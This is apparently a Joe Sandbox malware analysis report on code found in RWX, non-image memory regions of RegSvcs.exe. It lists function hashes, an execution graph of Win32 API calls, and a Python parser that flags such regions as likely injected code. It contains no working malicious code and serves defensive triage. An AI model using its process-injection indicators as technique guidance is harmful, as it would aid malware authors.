                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f39151096b3fa153b8636b7e2524f222693ca4d2adddf8b69e1c66604d022392
                                              • Instruction ID: cf6223c9d7c8b227680558aab020feed91b3599318f52a251ef58cd9e2f95b28
                                              • Opcode Fuzzy Hash: f39151096b3fa153b8636b7e2524f222693ca4d2adddf8b69e1c66604d022392
                                              • Instruction Fuzzy Hash: 0C41D031B0021A8FDF68EB79D5487EE3BF6AB48204F100829D605E7358EB358C41CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26b8cacf17048c23aa1287646ae3d37bc67a7b307334006d2605b753571a0785
                                              • Instruction ID: 0798bd0c181188fadafcd01feafad347521a4793a4c93fb9a2d471c6d63c6d43
                                              • Opcode Fuzzy Hash: 26b8cacf17048c23aa1287646ae3d37bc67a7b307334006d2605b753571a0785
                                              • Instruction Fuzzy Hash: 8451ED352522ABAFCF15FB2AF984A597B71F79A3047045B67D1044B33DDA207949CB80
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f645c3933cdc0e38762a90fad0862a36fe644fd78a325ef2cd37c5ea308f94fe
                                              • Instruction ID: 1e87182e4477572fa6612a455fd2e38efe4fa24953c1c1ffe688b5d5129d6ca0
                                              • Opcode Fuzzy Hash: f645c3933cdc0e38762a90fad0862a36fe644fd78a325ef2cd37c5ea308f94fe
                                              • Instruction Fuzzy Hash: 0D51CC342522ABAFCF15FB2AF984A597B65F79A3043045B6BD1044B33DDB707949CB80
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac4ba62b99f2b03d458cad910093bb4a4b504ea130412ea83afd8cdf742a3ac0
                                              • Instruction ID: 4547188ee47477c7530571ad041d557b2857e33630904da89b80659cbcd1b34e
                                              • Opcode Fuzzy Hash: ac4ba62b99f2b03d458cad910093bb4a4b504ea130412ea83afd8cdf742a3ac0
                                              • Instruction Fuzzy Hash: 17316E75B00616EFD705DB68C990E3AB76ABFC4304F14C168E4059B2A9CB32EC82CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d208fdb6a2bb338409f8a9c4dc7451acadf1edf9c7689fcd4e474f8f86d93feb
                                              • Instruction ID: c1557e51f2a95b194d168e89310930560299c27a8f73edab50c107f740934c2c
                                              • Opcode Fuzzy Hash: d208fdb6a2bb338409f8a9c4dc7451acadf1edf9c7689fcd4e474f8f86d93feb
                                              • Instruction Fuzzy Hash: B441E0B0D00249DFDB14DFA9C484ADEBFB5FF48314F248429E809AB254DB75A949CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d307b9a1cdc5fc8d6c736bbe67a2a31f70696f1e24efdfbf6fe6e5243ee58053
                                              • Instruction ID: 9043cbe9f9ac0014d75fa2b1eac1cd51fa957310e8e0c2330bdee9aa09fd069b
                                              • Opcode Fuzzy Hash: d307b9a1cdc5fc8d6c736bbe67a2a31f70696f1e24efdfbf6fe6e5243ee58053
                                              • Instruction Fuzzy Hash: DC314D34B002599FDF1AEB78C5646ED77B6AF8D208F200579D901AB399DB369C01CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0b138bdac8ba8571e8859d1625bf99a3b02096a632e01ae88446f6bbb2e3e69
                                              • Instruction ID: 49851a55e90e7ecf82a06346741cd1b40c71b2faf993e4fe7607ff838140ee39
                                              • Opcode Fuzzy Hash: f0b138bdac8ba8571e8859d1625bf99a3b02096a632e01ae88446f6bbb2e3e69
                                              • Instruction Fuzzy Hash: 3D41E0B0D00349DFDB14DFA9C584A9EBFB5FF48314F248429E809AB254DB75A945CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96ee002c2ee3907deda4ba8a94fb9c7970f44289e87e6b994f3c81274d649d6e
                                              • Instruction ID: ade5f28f7f739a7e9313a391ea1a2effddbf6f81f919791c9620bc15aad4a4a2
                                              • Opcode Fuzzy Hash: 96ee002c2ee3907deda4ba8a94fb9c7970f44289e87e6b994f3c81274d649d6e
                                              • Instruction Fuzzy Hash: 70313A34B0021A9FDF19EB78C9646AD77B6AF8D208F100579D601AB398DF36DC41CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a2e4a5ff8d54392896c89a6e72e9efca6fa4e86fea1769f270c1ddaae69bbb4
                                              • Instruction ID: 3c3ed06a881299173f4372eeb9063c0d3e34173db0205d75341e27f588cd37b3
                                              • Opcode Fuzzy Hash: 4a2e4a5ff8d54392896c89a6e72e9efca6fa4e86fea1769f270c1ddaae69bbb4
                                              • Instruction Fuzzy Hash: 8731B434E112499BCB19CFA8D94069EF7B6FF89304F10C62AE805EB349DB719845CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ac50729dae76e658466cb7fdbc2683262d91a8b2750973c097fb2e419513800
                                              • Instruction ID: 14a6a52958d05062196c2746d49e2761a2cd9b2f6f890b62ee4563b62353802c
                                              • Opcode Fuzzy Hash: 1ac50729dae76e658466cb7fdbc2683262d91a8b2750973c097fb2e419513800
                                              • Instruction Fuzzy Hash: 5021D3386401114FDF26E73DE988B9A7766EB49318F044B63D206CB36EEB25DC85CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc8c8210ac0e491a023953ec46b1966238f0f3cf4f5005d0bbab481877701405
                                              • Instruction ID: 16662d1ee387c59f3bd45dce435b3b4afebf2824c08627bd0aec997ef8e753da
                                              • Opcode Fuzzy Hash: bc8c8210ac0e491a023953ec46b1966238f0f3cf4f5005d0bbab481877701405
                                              • Instruction Fuzzy Hash: FE218030E1124A9BDB19CFA8D95069EF7B6FF89304F10C62AE805AB349DB719845CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 328c02acb514998b675a1c572f38cf6c9b9c2979ba060979ec5e1b6ca73aaff5
                                              • Instruction ID: feb025646b22e224ed107e88341e9e65abd7f96a0f5a28ec3a4d495a9ecbb6d7
                                              • Opcode Fuzzy Hash: 328c02acb514998b675a1c572f38cf6c9b9c2979ba060979ec5e1b6ca73aaff5
                                              • Instruction Fuzzy Hash: A921A431E103099BCB19CF68C9556EEB7B6FF89314F50852AE806FB744EB70A845CB51
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 636e5a43188cb55f2326acb7f7409eb11f2b0a3962744f727874fffd3d4a25c9
                                              • Instruction ID: ac0e77766d0b6c52db41a04ec5e8bb302beadb520f62237c9235873859209390
                                              • Opcode Fuzzy Hash: 636e5a43188cb55f2326acb7f7409eb11f2b0a3962744f727874fffd3d4a25c9
                                              • Instruction Fuzzy Hash: 41210671B101058FEB18CB7CC854BAE7BF6EF8C329F108165E505EB3A8DA718C408B90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3667cced2e5ff45133dbdaf2232b677b4e86f8f1ad622cc7de29099c71e1bf4
                                              • Instruction ID: cf6b6f645282711d42c0161677ccb9898d718d5e67c97c8c46aa877bd208363b
                                              • Opcode Fuzzy Hash: c3667cced2e5ff45133dbdaf2232b677b4e86f8f1ad622cc7de29099c71e1bf4
                                              • Instruction Fuzzy Hash: B621A8706802114BDB3AA73DE8483ED7761E706319F540C6BD606D779DDA24C8C9C742
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cfac2faa0e1836b9464270ce4dc160bb2bf1f934e80ecc5f68fdfb659fbf5e1
                                              • Instruction ID: edee77124d2f5ee5cb2c5d38f8bf16b9abcc5c76379c8d969857c66e8a26f11c
                                              • Opcode Fuzzy Hash: 6cfac2faa0e1836b9464270ce4dc160bb2bf1f934e80ecc5f68fdfb659fbf5e1
                                              • Instruction Fuzzy Hash: E1217C30B002098FDF68EB78D5547ED7BF6AB49208F200469C605EB359DB369D01CBA1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57c91a665e99a3d2f02e39b40b0cd707aeb55f4452c15948912d215c612a2f34
                                              • Instruction ID: 809fe5685e6f592439825a228d2734c80644ae1ce382d76b9b54a3c98abe45b1
                                              • Opcode Fuzzy Hash: 57c91a665e99a3d2f02e39b40b0cd707aeb55f4452c15948912d215c612a2f34
                                              • Instruction Fuzzy Hash: C4212B34A00209CFDB58DF7CD558AAD7BF1AF8D308B104569E506EB369DB369D01CB94
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffc9df9d32c0a75919402ea143ea386d837f012955f7dbd0cc1b39823c50d5d7
                                              • Instruction ID: dab61cd12a2cf5379ce3bfb7dfa481c9326b6dad52cbeaba583eb82bc7ed5bb0
                                              • Opcode Fuzzy Hash: ffc9df9d32c0a75919402ea143ea386d837f012955f7dbd0cc1b39823c50d5d7
                                              • Instruction Fuzzy Hash: 1F212A30B002198FDF68EB78D5547EE7BF6AB49209F100469D616EB358EF369D40CBA1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3243cbde1c4bbdf027709b74b529ab3e5bfa3c46b6a47261194a9b498dde631b
                                              • Instruction ID: bd75762856e5177638213e3a8a6c4cbe168228dbe7f3af708b9e5692875cfa6d
                                              • Opcode Fuzzy Hash: 3243cbde1c4bbdf027709b74b529ab3e5bfa3c46b6a47261194a9b498dde631b
                                              • Instruction Fuzzy Hash: 49216230E103099BCB19CF68C554A9EF7B6BF89314F10852AE816FB755EB70A845CB50
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52ab36350fb374299dae44e0775227f8f894a1ecd0a992119aed46df9f6478bb
                                              • Instruction ID: 7eacf77bd1f6c42b4c73138058bae8d5ba60f0fc173f686db34e2fb5c6c665b7
                                              • Opcode Fuzzy Hash: 52ab36350fb374299dae44e0775227f8f894a1ecd0a992119aed46df9f6478bb
                                              • Instruction Fuzzy Hash: E62190386401114FDF26E73DF98879A7766E749318F104A23D106C736EEB25DC84CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0514e38223c4362a73d5801c4f032c4932746ad070552055ebe7c6353626be8a
                                              • Instruction ID: 476a584cdc81e72111010b8b8e7f303490dad52fca3537f1c58d403090c0092a
                                              • Opcode Fuzzy Hash: 0514e38223c4362a73d5801c4f032c4932746ad070552055ebe7c6353626be8a
                                              • Instruction Fuzzy Hash: 3A213934B00209CFDB58EB79D558AAD7BF5AF8D308B104469E506EB3A8DB369D00CB94
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 549a8a3d43b9704027d88967beaa4dd25b25e2757c6860347296be91089e13d8
                                              • Instruction ID: 543c39894ab45bbd9e5058a2e0960b9f0decda12336e96b72e918e1468e0a3d2
                                              • Opcode Fuzzy Hash: 549a8a3d43b9704027d88967beaa4dd25b25e2757c6860347296be91089e13d8
                                              • Instruction Fuzzy Hash: FE11E231A01219CFCF2AAFB888552EE7BB5EB18219B140179E902EB305EB35C841CB95
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 62d6712cd1714c76ad4929f1f0f8713e6bfa95c1a9ac658221301c5828dd3803
                                              • Instruction ID: 6f2f20feee0a633b8a7b316032abe765267afeb29179fa8bc9e808f7f9644c5f
                                              • Opcode Fuzzy Hash: 62d6712cd1714c76ad4929f1f0f8713e6bfa95c1a9ac658221301c5828dd3803
                                              • Instruction Fuzzy Hash: D011C630B053045BEF2E667DD95436E7A95E785318F10497AF802DB29AEA61C8C58BC2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf7698fc195c267e188ce823437fa5f7e3ada6bc0a0eac6e5fb9b6c791c7ba87
                                              • Instruction ID: 8f81dc6b342df6ac2dbea5a84f3a3c30424bd73138dea948caaec60dccf92860
                                              • Opcode Fuzzy Hash: cf7698fc195c267e188ce823437fa5f7e3ada6bc0a0eac6e5fb9b6c791c7ba87
                                              • Instruction Fuzzy Hash: EE11C430B042045FEF2DAA7DD84476E7A95FB45318F20497AF406DB35ADA61CCC58BC1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd5e4ae2d4643b2674eff1a6a0069fd02439956651afa8f71eb685577e0f2712
                                              • Instruction ID: fa8116d7045620b6c050aac6b654fc8e9b27c3d36a39301c62c390764180441b
                                              • Opcode Fuzzy Hash: bd5e4ae2d4643b2674eff1a6a0069fd02439956651afa8f71eb685577e0f2712
                                              • Instruction Fuzzy Hash: 61018031A012198FCB29EFBD84512EE7BF5EB58215B140479E906E7305EB35D881CBD5
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35ac15b151ec39790401a9b6bad261e3980584acd15f3a8c4b6471473de9b9c5
                                              • Instruction ID: db0b51964d03fba9eab755d4fa94d1594e4d798e02e0cbfa3239bac21fab2d1e
                                              • Opcode Fuzzy Hash: 35ac15b151ec39790401a9b6bad261e3980584acd15f3a8c4b6471473de9b9c5
                                              • Instruction Fuzzy Hash: 7A015231A101058FDB14DF99D98479ABB71FF84311F54C264D9085B29AD770AD45CBA1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4aa20f9576ecb8d5dae0f048e679dcc912ca835189c5185180577d5276776915
                                              • Instruction ID: 3888933e08a713faf2878c66255f0924e3ab4c5484f4a8b702de3c03a84f34e2
                                              • Opcode Fuzzy Hash: 4aa20f9576ecb8d5dae0f048e679dcc912ca835189c5185180577d5276776915
                                              • Instruction Fuzzy Hash: 1C01627491020AAFCF41EFB9FA4179DBFB2EB44300F10467AC00697268EB319E499B50
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5a170d1f5fc4825841b85daf9af7fa31deeb40cbdbb994ecbae774a3452bedf
                                              • Instruction ID: 4eb8dae142ab68022cba8033f0f3faacb87d9c37b0da95cbe5718f679b12c26b
                                              • Opcode Fuzzy Hash: d5a170d1f5fc4825841b85daf9af7fa31deeb40cbdbb994ecbae774a3452bedf
                                              • Instruction Fuzzy Hash: EBF0C435B40218CFCB14EB75D598A6C77B2EF88625F6084A8E5069B3A8DB31AD52CB40
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 28b3219fccc3aad3175ecd39c319800f76789f480ed7e542626d414890ec7fcc
                                              • Instruction ID: a56cfbeb44672031250701968c0fff1df758b31e2d8a7173a411213584adc8a5
                                              • Opcode Fuzzy Hash: 28b3219fccc3aad3175ecd39c319800f76789f480ed7e542626d414890ec7fcc
                                              • Instruction Fuzzy Hash: 23F0FF3495021AEFCF41FFA9FA4169DBBB6FB44700F10467AC00597268EF31AE489B91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 10d47ed52f292e7d5df3fe4dc01c1fb0c229cad3e4aaa0b15068c55b84f7bcc1
                                              • Instruction ID: 0d883fd1665ea97440fc341b977e15f83dfecaf0b9808bafaee4b1257b15e2f8
                                              • Opcode Fuzzy Hash: 10d47ed52f292e7d5df3fe4dc01c1fb0c229cad3e4aaa0b15068c55b84f7bcc1
                                              • Instruction Fuzzy Hash: 70B0120101F7C02AC79313211C163C23E508B83144F29009F40CA58042E00041054F23
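
The records above all point at the same dump, 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp in RegSvcs.exe (process 8), which the report marks "based on PE: false"; the records that follow for process 9 sit in the same kind of region at 01090000. A practitioner triaging this wants those facts decoded rather than read off a dotted file name: 0x40 is PAGE_EXECUTE_READWRITE and 0x00020000 is MEM_PRIVATE, so the disassembly comes from writable, executable, non-image memory, the footprint of unpacked or injected code. The Python below is an added example, not Joe Sandbox tooling or output: it parses "APIs" and "Source File" lines as they appear in this report, decodes the dump name, cross-checks the base address against the Offset field, and flags RWX non-PE regions. The field positions in the .sdmp name (process index, base, protection, region type) are an assumption inferred from the sample names on this page, not something the report documents; the constant values are the standard winnt.h ones; the excerpt is constructed from lines on this page.

```python
"""Decode Joe Sandbox memory-dump source names and collect the API calls the
report attributes to each dumped region (added example, not Joe Sandbox tooling)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# MEMORY_BASIC_INFORMATION.Protect and .Type values from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK, WRITE_MASK = 0xF0, 0xCC   # any PAGE_EXECUTE_*; RW, WC, XRW, XWC
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)
API_RE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*[0-9A-Fa-f]+")


@dataclass
class DumpRegion:
    name: str
    process_index: int
    base: int
    protect: int
    region_type: int
    pe_backed: bool
    functions: int = 0                       # disassembled functions attributed to this dump
    apis: set[str] = field(default_factory=set)

    @classmethod
    def from_name(cls, name: str, pe_backed: bool) -> DumpRegion:
        # ASSUMED layout, inferred from the sample names on this page, not documented
        # there: f[0] process index, f[3] base address, f[4] protection, f[6] region
        # type, all hexadecimal. Other fields are left undecoded.
        f = name.split(".")
        return cls(name, int(f[0], 16), int(f[3], 16), int(f[4], 16), int(f[6], 16), pe_backed)

    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    def is_suspicious(self) -> bool:
        # Writable + executable memory not backed by a PE image: the footprint of
        # unpacked or injected code, as in the RegSvcs.exe host in this report.
        return (bool(self.protect & EXECUTE_MASK) and bool(self.protect & WRITE_MASK)
                and not self.pe_backed and self.region_type != 0x1000000)

    def summary(self) -> str:
        apis = ", ".join(sorted(self.apis)) or "(none listed)"
        return (f"proc {self.process_index} base 0x{self.base:08X} {self.protect_name()} "
                f"{MEM_TYPE.get(self.region_type, hex(self.region_type))} "
                f"pe_backed={self.pe_backed} functions={self.functions} apis={apis}")


def parse_report(text: str) -> dict[str, DumpRegion]:
    # Each function's API list precedes its "Source File" line, so buffer API
    # names until the owning region is known.
    regions: dict[str, DumpRegion] = {}
    pending: list[str] = []
    for line in text.splitlines():
        if m := API_RE.match(line):
            pending.append(m["api"])
            continue
        if m := SOURCE_RE.search(line):
            region = regions.get(m["name"])
            if region is None:
                region = regions[m["name"]] = DumpRegion.from_name(m["name"], m["pe"].lower() == "true")
            if region.base != int(m["offset"], 16):    # dump name and Offset must agree
                raise ValueError(f"offset mismatch in {m['name']}")
            region.functions += 1
            region.apis.update(pending)
            pending = []
    return regions


def flag_regions(regions: dict[str, DumpRegion]) -> list[str]:
    return sorted(n for n, r in regions.items() if r.is_suspicious())


# Constructed excerpt: lines copied verbatim from this report's disassembly section.
REPORT_EXCERPT = """\
APIs
• GetCurrentProcess.KERNEL32 ref: 0109D0BE
• GetCurrentThread.KERNEL32 ref: 0109D0FB
Memory Dump Source
• Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109B079,00000800,00000000,00000000), ref: 0109B28A
Memory Dump Source
• Source File: 00000009.00000002.1779407609.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
Memory Dump Source
• Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
"""

if __name__ == "__main__":
    found = parse_report(REPORT_EXCERPT)
    for name in flag_regions(found):
        print(found[name].summary())
```

Run against the full report text, the same parser groups every disassembled function by the dump it came from, so the Win32 imports reached from each RWX region (here CreateActCtxA, DuplicateHandle, LoadLibraryExW, GetModuleHandleW, GetCurrentProcess/Thread) can be compared with what the host binary's own import table would justify.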

                                              Execution Graph

                                              Execution Coverage:8.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:55
                                              Total number of Limit Nodes:4
                                              execution_graph 14975 1094668 14976 109467a 14975->14976 14977 1094686 14976->14977 14979 1094779 14976->14979 14980 109479d 14979->14980 14984 1094878 14980->14984 14988 1094888 14980->14988 14981 10947a7 14981->14977 14987 1094888 14984->14987 14985 109498c 14985->14981 14987->14985 14992 10944b0 14987->14992 14990 10948af 14988->14990 14989 109498c 14989->14981 14990->14989 14991 10944b0 CreateActCtxA 14990->14991 14991->14989 14993 1095918 CreateActCtxA 14992->14993 14995 10959db 14993->14995 14996 109d751 14997 109d714 DuplicateHandle 14996->14997 14999 109d75a 14996->14999 14998 109d726 14997->14998 15000 109acb0 15001 109acbf 15000->15001 15004 109ada8 15000->15004 15012 109ad97 15000->15012 15005 109adb9 15004->15005 15006 109addc 15004->15006 15005->15006 15020 109b030 15005->15020 15024 109b040 15005->15024 15006->15001 15007 109add4 15007->15006 15008 109afe0 GetModuleHandleW 15007->15008 15009 109b00d 15008->15009 15009->15001 15013 109adb9 15012->15013 15015 109addc 15012->15015 15013->15015 15018 109b030 LoadLibraryExW 15013->15018 15019 109b040 LoadLibraryExW 15013->15019 15014 109add4 15014->15015 15016 109afe0 GetModuleHandleW 15014->15016 15015->15001 15017 109b00d 15016->15017 15017->15001 15018->15014 15019->15014 15021 109b054 15020->15021 15022 109b079 15021->15022 15028 109a130 15021->15028 15022->15007 15025 109b054 15024->15025 15026 109b079 15025->15026 15027 109a130 